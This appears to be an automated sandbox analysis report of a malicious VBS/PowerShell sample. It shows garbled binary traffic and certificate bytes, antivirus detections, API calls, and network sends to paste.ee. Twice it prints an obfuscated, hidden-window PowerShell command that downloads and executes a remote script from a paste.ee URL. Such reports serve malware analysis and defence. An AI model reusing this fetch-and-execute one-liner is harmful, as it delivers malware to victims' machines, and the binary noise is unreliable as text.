UBE10U GlobalSign nv-sa10U Root CA10UGlobalSign Root CA0 231115034321Z 280128000042Z0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R40v0*†HÎ=+"bóts§h‹`®C¸5Ł0{KIûÁaÎæÞF½kÕa5®@Ýs÷‰‘0Zë<î…|¢@v;©Æ¸GØ*璑jsé±r9Ÿ)Ÿ¢˜Ó_^X†e¡„eÑ܋ÉÇsȌj/åÄ«ÑŠ£ÿ0ü0Uÿ†0U%0++0Uÿ0ÿ0U€LÖëtÿI6£ÕØüµ>Åjð”Œ0U#0€`{fE —ʉP/}Í4¨ÿüýK06+*0(0&+0†http://i.pki.goog/gsr1.crt0-U&0$0"   †http://c.pki.goog/r/gsr1.crl0U  0 0g 0  *†H†÷  ‚B»Ö‡–ã?c ¤¡hH 9"sžøËN-1éŸç ¡Ò6„¬yëé°ëj¶{ }t¸›e«h*,,ÝBýÆq χ-÷kÈn}Vâ#XXù%º…G×– ý ¶Œà.®UÑyu5,1[?e¼Íœ‡B§‘±›^Žñ»Ê-Gð¬c~†¿ÖäkÓÖÓŽŠgX¸ÿ÷¦„ IP[?: % ò‹\ÓyW6‚Îÿ&·©ñ™í­‚>ÈnëÓ<8ÀAšá^SÏ> Wëîâ?H¥ñ¾Ñj# û?/¢µ½ên£FÎ.g¯3&˜ªÕKÒ©6Å&;[‹ˆÁå
Data received ‘
Data received AZÞÏlU´O‡5\“m( C_?1Êä՜ÞdÂg÷G:ϏÖÏQ#Êh‰ƒ¶${¯=ÂÒ)MW MûqÖތ?œñ¶ F0D wŽ;ˆºWû¦Æ[{ßû-š±MÍ y(u×p˜â†  Ið¡4¹ÈuQ&ø~Áõ.®)i›‹Å®í™çžJèfx
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received oOD¸e•’e+@ï†2š,ð>¬ høx¶âQ'-]˜%QFéeIƒGÄh 8»çH
Data received p
Data received §ä=ÒB‡é.kRÌ€(R0¾_€9¸E¥ÉĞVZ&É&ÅlÎ5¯@² ô#nµ ùzkúœÖ± æÎVô¬\ýèäÕ¸²‰ (Ä[<ml!©ãAÝNcÛôVÅÔ+L†Ly òݕˆèZÎ4Y”"rÂgÈL ‘ ¦8›`¥12u:«í0å55‡­Ð\%!"ÐskrIÀ•—@XcÑg½ßè†Ô -íjìà ²tÐ<í96/ö<¢„ô¶z:¨Ä#9Ñ?MyT®+_"×À€°ê3tå Àù*†q¡ ·žá(ºž‘õ|§>§×ÁÀ!I’.0Ï¥j,^ò+FeKû˜UÄ0,,i±×"g™?l¬Þ;¢ÂC,«[ÇEKTuž%òTgÃ."{©¢…/I+{Ü'XÜã®±Ûy´ $‘–rFÈ©üØ©íþXä]ŽýÁS;!ä‹7ÿMõ’.™ŠJ6û@ÌTQMósIË&ã$94¹¿šsÔ½<TfﬤøQ2¤öËXIŠøEBûÈ ªv|ÎL,·b¼ ñA(ññ£H›KÎèÈÛ=¨N*5 ¥ê%k ›Ñcí:ÌQÓõ—´ñIAÞVä$ñq˜—Œ†»xFzxâ0$ÀÆ¿¤øc‘fá3[˜ mm?NÛÂÉtßNj¢   KÛAŽaÓ!L#ž?£Ð–«¯b›<‡¬29Ý2­>ka¿26fl¯½þŒ)ÀTËáLè~«–ÓK  ›dÚ+?ƒ‹‘§|ÝdÔÿ+º A*÷¤Ón”÷">½Pžs¼ÇYwF¿žê5††W,1¯}µ9d4ç….Öx¤ÀvÓfSäCv^»Ã¾\‡– w]öۋTH !‹ú ÜׇQ‹Æ÷Š8Tâþ.Öɛ½ôàÕ^âB£°,\9h*…ØLF }Šû1NfÌϰ઻P'CXU‹M ³¨U‰üÇH„Ë.`Ž°sßI¥{SËãØ.ýòèAeªCuŠ4ÚÛAѕ˜Ox)ù@Ábß幞8š×G´å¡Õ E‡Õ‹{Z© Z! ñSý[CŠdn—2(bý0ž½h-ç;oû/Ä^ŸK‹ñ\ÒEI°D}q ®Ë)ß^e/Cfµ&Š>ôÚê#Ý:¸e%¸Ç0¸­¨c£WD†âÞbÝ0ÐøÈÜW›ýp 5†Ý¼Žz£%ÎQl©> Œkœïºª«À:•±_ŠË^yË*ý”¨6sgÞÀsD;qžSµäþZô¦ÒŸÐþ°Ç”Y²R½KbûυьÐR§ë…•šåŸrö…SuùÍõúåT> ÷Q$z“=L,PoÙ u±‚‹9y~äaëJTž‹ïÇ¿J¦ü#)7“êÒ)d{=غ(© Ë%–/&¼k%¦šœ\Gg|›ëÕ*¬žÆ=ô‹q’"…Í€›Zið¸Ë\5Ïc’‡Ü8”Æ›Lýº}ª¹oÜ~ÈGÅS5é‚%Ùfï›ÄD>>½E}:ñ$ÇÊ †¬|úe™_·È=9òœ¶î™c~o³Îç€zøÂë LÆç­Mæá•3þzæ Š=1ˆ\ß{+JO³´—µ^u´6ýB?C±<þòëíÃwÆÁVzZø€îGmá£áÒY¸1~¨ZŠàÂëŒG$Ջ£kÜÝÑ\¨À„¦„¨9Àù|V®´¥vD¸`ß gÕS’(ÓÊê Š±¥ ð‚Ú–ž33Q1×EØÝé÷ôe¢½Ú["î—&.ø“uÄô(Ž6P6üä„cÑ}âè5e…:±íYØeþoü£_à>`0¦gõ×क़;¾€6ÁûÚ2t¿Ÿ;'×ɐ¨¡€H
Data received imƒ·oÄ8nI%Ùh‰ Ɏk›9†"†æ˜{IÄébö£T’6? j R¶Kƒ\ãóÉ՜l09ê¹3íåk½¸• нN[ôÍe«Ó˜=§Œ‡@T²ßC¹‘iû?®n¹ÆOýIãc‹ƒÇ¨—µD¾Zý­oFÛp/šßYƒU¥sÈ<SÏû»üɒýtùÖ1u u±:ƒ›F[#amw÷<2iðÙÏSÕ>q­ ¡†ñÁýòԑ£^…ï$ñ¦íÔ¨%©íüDòfU.1ÝOT!$¥Á7qd¹„¯Ö:„]óxxLÄËé¡ÒÝ¥bÛ¡”êÄ}güV¢òôín&T¶6t™^øŠgLW@)zÑó_×ÛÚ«wÄ~Ìú T±õ.Pk}Bʊ?*5=x5:½ÃEì£BÝ|'éµf]¾iÇñ—CUc!jqcLB³-zñSòLdvT_uÀ%0A…›é©åe&e"ŽÒ[ƒ³´-\ÈbFö¢´ QõDzNéxXùI§& 1J՚.v1¦A$pt¬ü†#ÊÏ3åRª Îd¯(»Öñqô¤Œìc²“0wËl…·N6ÌßgãCÛÓiÒc,‹B«ò÷-«>•4á¿}IWí€%e—øÅðCE¬‰Ô‰¯3(·õ†Òú RÚ\gúìRå 0oíÒ>ƒK^O†‹4Õã"Ùҙ-,Pð)Ñ°ŸÊýüºf*B¿-©AĔ„—×3A¯e*€ÛÛÚü˜§àÐ*ÿ¾8š¦˜×3[猹o•üáo4sˆJŸÔ2™¥bó' àÍt"‹–ß%±J¼NÚÇÎV ™2,>ˆ.bæ^¦˜If՟ã131Ï?K@ñvqNµùŸ0ͪz‘cÍÉKMD¸¼»ß;ºðŸ—¡Þ?þÖkƒpÁA֒òvz]ŽöpƒæÿúÅýù?PÁºx¡qir|6 Ÿ„©Œ:«<ԙÛZ|ϐ§ƒežïø–ÿïÛ»|«í=ã¿#^¡Õ˜ÿkx€I«vÿ=é7Cgç5r¯>.zæ?;EՊÏ¥¾¨Rm.HäØh/C²–Ýâ̆qD@Aàö¿CªË±EÃ÷ш*¯ùüÓ_…$ȝØ{Šw²»Åz“ ñBP¬.§$.l8–Bmǂ !HJS†é>ö^ÚбëÖ='­âÂN:æ1OmôºÓÚcoǦ\añÛzþÞÌhéáÿsVÈË3¡Ã=ŒhEí÷hÐE+ÈX†³éYŽAüÊV õ;¢9=º>¤ª0,}·Z×ÓjLù+AöŒœ8Çè_Q<ú.3 ý39–³õe»#6›¶µ4ˏ óRÊîFmIåâ€UT¦p€ŒQ¼ºÂòÝjλœ}øÀV9uN³¨f‚YðOƊF6¹WE÷U‰ᜋðý¦_4Í)ÓÁÞ~÷Û ¿'¸q&ȐWãs(Ù?CÃi~ªWnÊ;hä¬1Jœan¡ NŠ–âøV½»Ñ⭊›¥«¿æcqÂÂïÃÐ*ƒžý'U"]†x…e‚NèÜ P+sMz%_Ó.™Pg47ÿáe”“Ç*ħÖ͇@f.e“à ¬áœ¶þõêB@ƒ¨{}KÉ-õG&1H ׈Èí‹ö:“ÿb› ÆQ=ñ_«XIï·A\£—…õĊ4¨Ó-š´šv󪱻kO†O ùnÌÏv’ßΫ+³;zŸ¤m‚ ’ OÇD‘¦W=Loo'ù˜ÉòmiÔ)pM´§ÉMžøÙ~ 10^7£Á,9‰æ_)zhÂe`$ D–ñ‘¼ÑbâMyrý
Data received ì3™½¼ÐüÌÃ:7½¥Wêé"øžÏõ<åÓ=ÌáÔ/p!¸¡ï±ÌöÁœj7üO‰ãöš+&¦dMŸž“”%#‚1†ã‹†ÃÆÊݜ.9•™šÂ A„²£ï8¢dÙµlNL„f]qqïG<väÀæ ¿ãCsGɅŸ[3ž*úÄ#ÀHh…È­‰»ŽÐvÀ·¸r^ˆ²»p2V ¶GÐ÷Uð¬Ÿ8²µxá0±Q=©×jÎÛ®ê$àÚ¼ Iìeӕ½Àh4Òù4BkbkníKtarâåjd-Eæ*àwBdÚPñ2½]’çÑÅTƍ=ÊP÷Þ0Û,Ü©WüÐ|Žb8©Ä /”­Nó¦LA-Ö z7YÚ»“¨NÉM_bËRêÊmðÄ`…¡&nÃòyÄm=v9Ê^òÅ-ýÒTd2ÄV ,û•xüžÛfÖ¯Ú\ê©Ñ”Aýÿœæëx‡!c!@ñðô2ž¢€ V 7 ÿ1_¤Û7 DÒ,‚ÛõÞÍÆÀ9ðcñÒ8‹èèÕ±k‡Äɘx´eÛsxHÄu4^ýðJ„oôløMýž‘ZÚ¬5‡1ÎH_!-¦tE¥üR¬-—Àߊ~3iN±n5ÍòKK€Bˆ5ulµvï<þ¾RŸbëYfë« –ç ­† ËWÁ'¶~íUîV¾êPþ`I:u?0}[lÛÓ·±+ËAA³ùF¢À&‘z&«5¨Ìr¬gåH'›vߣ$yéãigù^YÍ Dގ„ƒµJE(sTXïY™OåÿáÔðnHà .6´‹q!n]€*\DØ–udÿjzšñ¦ÐcזÊ]Èä+ÿíCÔ]ÇâÇ=ÜåM8ñNÈC0$´:0yê³=Q÷ §kԘ}µ^êl­œk¯˜8+݋$!‚Ø]€Û‰T¯Ô¿pWjßüŽhGÕ̜Hî&ˆÈU˜|lEÞÓMôc*dÅóLË&Š ;Éޝ( æˌ¹˜;2ˆXS‰ÿLÀí·tç½#j:…Üw¥ÍåƬsö[i°12ü£«Þy=gù)²†; ’1$Ëè€A2›)·¡hµ*p¢Cx§O]\Ù~"MF¶—Z€)X;L;ä#½¿È)`ˑ/±Àñ뚪³Ü€2íªs+RŒ—g?©å¢ãd'† ³XüêÍ=ÿez_ÍF–ñ´ˆáee‡vnÌv´–¡q ¥>ÕÖn¨Ý׊ýÜ«¡¦_“CHÔ%Cä£Kz‡£ó”ϧưƇãÁ§H‰Ï,ôû9]¶€^[ûsqJԑaþ?¥ÎڌK`Ÿv7|ñ Rlýä?ÜZDPÓÆPŽ¢•6;‹º °„H˜V*û¯ÏŽöÕ¦'¦»7î’_L¹hr\£x¿æÁó"m_ŒQz)ÆãÊã„jã¬4x¬üEŸ4óy©[ºZ݆ó±|x<Z„Ìæ)!#d–©¯:«`ÄìŠz&bÃNpé±q,Ü+Q9„"ðÁŠÑ<ù£€{¼øóU4A%éÒ n‹îFʳ+<7»ÇEÿ©àÆ[×í¨´õ‚'µ|£:E’¢ôpˆk “Äû㗐À°ëò0áPs:a£h4p•ÿ2è­ÌÌc`ØñþvŠ3µÄ!- `\7kh>2ã˜VóR$;â‘4­@šsݲ6•¼`ž8½]*,ïÆ1gÁª pÂH×Yã–ü8ÍyOš„öê[%Q¹U+nâ ¡ž˜ †«šõD ]éê I‰D;1ªO¦ÏüM„‹&S¸OK@€,ßFL«öзõäÔðâ&è"uÁö@m6¾!ƒ
Data received 
Data received œAB“Ê×ÔÂúUà舀ÿ5û„ðÖÛRíu€ˆ"óF70þÄʝR%›ÿb¡3R~lãB<)],½¸îÇ\%‹0êw“g ?!¾z°ld_eÜ=‡m1)ãÖ启H[J5|ŒB/ɏãZù3=/‹©©ÆöL˜k ‹MÅ#òQõHQ€‡‚–¶S)cpC©e÷‰T<À‡çÅpŒMü¿×´–ÁËAþ%Ù?wV²§IáÔc!GeŸÁ·§¢C‚ÓÒãmûóï6wD-CÂj¼èm§jò»òüñ_R97-ešVÊ2ÍΌ@à§e2ŸK¹#«Ç2¶•°e;>*L¹üáÃxa'î4¡£M¨—ŽÞÞ§+ÕC#i<Ú­³wŸ”b±#'ï™X‹ÍsÏ rÖC,ß ÂD|G¯sN·¾·ˆõäæSú§ߏXÝÌ(xß~“)KØÜ•Hë²Pžº$ĦOúÑ?MË¡rFÙo-Ë[Ð9ú^È`¸ýV;V`ÑÇAþUdiS|\üÆÒÖ‘›Ž£¬Ñ´Ò¤ï³îˆÏ†Á¦Q¦¥Ñ°{ØíKÈ|“cëß*ܘåÖ½ªà€˜´÷L›? :,†I•´6L| øínªý6½åœp %fŤîE®Ëšë¡((ԉ^ˆ¯!vŽÐ2Û½Ã`µ6o܉š«ùrÈk‰|œ†D*«K+^®:´ŸPmýýÁºû³É[üÛðU;Õa[Âήù¢ÚfIÔý·äFÓ9èҎ6-vVÖ3ƒ,çÜ•fâŸÊyIõÊÐÊ0D4 ý¾fHAgÅ[;‘òªg²¯]oªÎMǟ}sÚǾê UjBcGN ¼ÎRA[FïáûH‡fÈ®û€×Y¯UòÌäÌ}tÜ´Íõ"‚Z¾l7Ҁ+©þÐâ½×5ESº@:„ƒþ‚x™˜0\ÂbŽ<SJÜiì‰F+”Êꜭš¥s­[xÔ¹kv&í·øTÆáÛH›/®…£cþ\H†Ð̙³rQ¶Šb¯iÉYßò™ŸíKró癮Zådã¹ݤ>+vãí& IÇÖð—ø3h3¿W³:pê¿U:C·`;Ii~ÒeR¦ N+îüÂBOi$wM‘‚Ò¼ºÓ>jCIAw²¬ý×£AÛ¨ «­:8´VØ£`wùTÌT²—ß
Data received 
Data received ·?Ã2zÚáK.…[c4ó¿õÊå÷íoÂNݑXpÛÐ
Data sent kgf§Ic&>ãLϞ*ÝW¾Ó±ª!Haø1ˆz:{\¶ /5 ÀÀÀ À 28&ÿ paste.ee  
Data sent FBAºð5˜é¿Sè]ól‰ýUf ü1Ã4³Dó¯ùñ-›°ú”¹`%˝atÃBhœ0º|›ätnÔ§ŸËÝ3Ú0Û(+Ý_{wn$ ù=Qã¦îõîzo¡*äT×b³ºVŠûëìGzã•,°
Data sent `©+ys*&H>¡'<> vÓoR[ç‹=©öå äK?n¡ÖkõӖ!öqmgçßì´aיéÂn½u¥‡¬ïÏݳþ¼1°У Œ<± ÅÆÈÐQM@²ɞAMÔªŠí';
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Symantec ISB.Downloader!gen80
ESET-NOD32 PowerShell/Runner.A suspicious
Avast Script:SNH-gen [PUP]
Kaspersky HEUR:Trojan.VBS.Alien.gen
Rising PUF.Runner/PS!8.188C4 (TOPIS:E0:V57SxEang5G)
Ikarus Trojan.PowerShell.Agent
Google Detected
ZoneAlarm HEUR:Trojan.VBS.Alien.gen
Varist VBS/Agent.BOL!Eldorado
huorong TrojanDownloader/PS.NetLoader.fk
AVG Script:SNH-gen [PUP]
Time & API Arguments Status Return Repeated

send

 buffer: kgf§Ic&>ãLϞ*ÝW¾Ó±ª!Haø1ˆz:{\¶ /5 ÀÀÀ À 28&ÿ paste.ee  
socket: 1396
sent: 112
1 112 0

send

 buffer: FBAºð5˜é¿Sè]ól‰ýUf ü1Ã4³Dó¯ùñ-›°ú”¹`%˝atÃBhœ0º|›ätnÔ§ŸËÝ3Ú0Û(+Ý_{wn$ ù=Qã¦îõîzo¡*äT×b³ºVŠûëìGzã•,°
socket: 1396
sent: 134
1 134 0

send

 buffer: `©+ys*&H>¡'<> vÓoR[ç‹=©öå äK?n¡ÖkõӖ!öqmgçßì´aיéÂn½u¥‡¬ïÏݳþ¼1°У Œ<± ÅÆÈÐQM@²ɞAMÔªŠí';
socket: 1396
sent: 101
1 101 0
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/9gCcH/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
parent_process wscript.exe martian_process Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/9gCcH/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
option -exec bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -wind hidden value Attempts to execute command with a hidden window
option -noni value Prevents creating an interactive prompt for the user
option -exec bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -wind hidden value Attempts to execute command with a hidden window
option -noni value Prevents creating an interactive prompt for the user
option -exec bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -wind hidden value Attempts to execute command with a hidden window
option -noni value Prevents creating an interactive prompt for the user
file C:\Windows\System32\cmd.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe